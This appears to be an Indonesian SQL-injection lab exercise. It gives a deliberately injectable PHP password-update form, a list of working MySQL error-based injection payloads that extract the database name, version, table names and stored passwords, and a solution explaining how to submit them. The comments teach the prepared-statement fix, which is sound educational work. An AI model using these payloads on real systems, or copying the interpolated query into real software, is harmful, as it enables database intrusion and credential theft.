MySQL Update Query

Masalah

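<html>
   <body>
   <h1>Update My Password</h1>
   <!-- An empty action posts the form back to the URL that served this page.
        The original attribute wrapped the undefined variable $_PHP_SELF in a
        php tag, which output nothing (and raises an "Undefined variable"
        warning on PHP 8). Do not replace it with an unescaped
        $_SERVER['PHP_SELF'] either: that is a classic reflected-XSS sink. -->
   <form action="" method="POST">
      <!-- Kept as a visible text field so the injection payload being typed
           can be seen in this lab; a real password form uses type="password". -->
      Password: <input type="text" name="pass" autocomplete="off" /> <input type="submit" />
   </form>
   </body>
</html>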

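<?php

// NOTE(review): this listing is a SQL-injection lab. The UPDATE statement
// below is left deliberately injectable so the "Worked Payloads" list further
// down keeps working against it; the unrelated defects (undefined-index
// warning on GET, unescaped output, stray ';;', message typo) are fixed here.

// Hard-coded root credentials are only acceptable for a throwaway lab
// database. Real code uses a least-privilege account and reads the secret
// from configuration or the environment, never from source.
$mysqli = new mysqli("localhost", "root", "changethispassword", "exercise_session");

if ($mysqli->connect_errno) {
    printf("Connect failed: %s\n", $mysqli->connect_error);
    exit();
}

// HTML-escape anything that ends up on the page: MySQL error text and column
// values can both carry attacker-supplied characters.
$esc = function ($value) {
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
};

// Act only on a POST that actually carried a scalar `pass` field. The original
// `if ($_POST["pass"])` raised "Undefined array key" on a plain GET, rejected
// the legitimate value "0", and would have stringified `pass[]=...` as "Array".
if (isset($_POST["pass"]) && is_string($_POST["pass"])) {
    $pass = $_POST["pass"];

    // !!! INTENTIONALLY VULNERABLE -- this is the exercise !!!
    // $pass is interpolated straight into the statement, so a leading single
    // quote in the submitted value closes the 'pass' literal, what follows is
    // parsed as SQL, and a trailing `#` comments out the rest of the query
    // (" WHERE nim='1296001'"). Every payload listed below relies on exactly
    // that. The correct form is a prepared statement, which sends the value
    // separately from the query text and cannot alter its structure:
    //     $stmt = $mysqli->prepare("UPDATE tbl_mhs SET pass = ? WHERE nim = ?");
    //     $stmt->bind_param("ss", $pass, $nim);
    //     $stmt->execute();
    // A real application would also store password_hash($pass, PASSWORD_DEFAULT),
    // never the plaintext value this lab writes.
    if (!$mysqli->query("UPDATE tbl_mhs SET pass='$pass' WHERE nim='1296001'")) {
        // The raw MySQL error text is the output channel for the error-based
        // payloads (extractvalue / updatexml) below. It is escaped so injected
        // content cannot double as reflected XSS; production code would log it
        // and show the user a generic message instead.
        echo "Error code (" . (int) $mysqli->errno . "): " . $esc($mysqli->error) . "<br/>";
    } else {
        echo 'Query was successful, proceed.' . "<br/>";
    }

    // Read the row back (fixed nim, no user input in this query) so the
    // effect of the update -- or of the injected statement -- is visible.
    $result = $mysqli->query("select * from tbl_mhs where nim='1296001'");
    if ($result) {
        echo $result->num_rows;
        if ($result->num_rows > 0) {
            // output data of each row; column values are attacker-influenced
            // (the injected password), hence escaped
            while ($row = $result->fetch_assoc()) {
                echo "ID: " . $esc($row["nim"]) . " " . $esc($row["pass"]) . "<br>";
            }
        } else {
            echo "0 results";
        }

        $result->close();
    } else {
        // The original silently ignored a failing SELECT; report it the same
        // way as the UPDATE so a broken lab database is diagnosable.
        echo "Error code (" . (int) $mysqli->errno . "): " . $esc($mysqli->error) . "<br/>";
    }

    // Reference payloads for the injectable UPDATE above. Each one opens with
    // a quote to break out of the 'pass' literal and ends with `#` to discard
    // the trailing WHERE clause. Kept byte-for-byte from the original listing.
    echo "<h1>Worked Payloads</h1>";
    $payloads = [
        "' and extractvalue(0x0a,concat(0x0a,(select database()))); #",
        "' and  (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x)#",
        "' and length(database()) #",
        "' and hex(database()) #",
        "' and hex(hex(substring(database(),1,3)))#",
        "' or updatexml(1,concat(0x7e,(version())),0) #",
        "' or updatexml(0,concat(0x7e,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)),0) #",
        "' or extractvalue(1,concat(0x7e,(select concat_ws(':',id, nim, pass) from tbl_mhs limit 0,1)))#",
        "' or (select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)#",
        "' or (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)#",
    ];

    // Shown inside <pre> purely as text; escaped so payload characters can
    // never render as markup.
    foreach ($payloads as $payload) {
        echo "<pre>" . $esc($payload) . "</pre>";
    }
}

$mysqli->close();

/*
 * Generic injection-context templates noted with the original exercise
 * (typographic quotes normalized to ASCII; the dashed lines presumably meant
 * the SQL `-- ` comment -- confirm against the original notes):
 *
 *   ' or (payload) or '
 *   ' and (payload) and '
 *   ' or (payload) and '
 *   ' or (payload) and '='
 *   '*  (payload)   *'
 *   ' or (payload) and '
 *   '' -- (payload) -- ''
 */

?>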

Penyelesaian

Kirim salah satu payload dari daftar "Worked Payloads" pada script di atas lewat field Password. Nilai `pass` disisipkan langsung ke dalam query UPDATE tanpa prepared statement, sehingga tanda kutip tunggal di awal payload menutup string literal dan `#` di akhir mengomentari sisa query; untuk payload berbasis error (extractvalue/updatexml), data yang dicari muncul di pesan error MySQL yang ditampilkan halaman.

Referensi
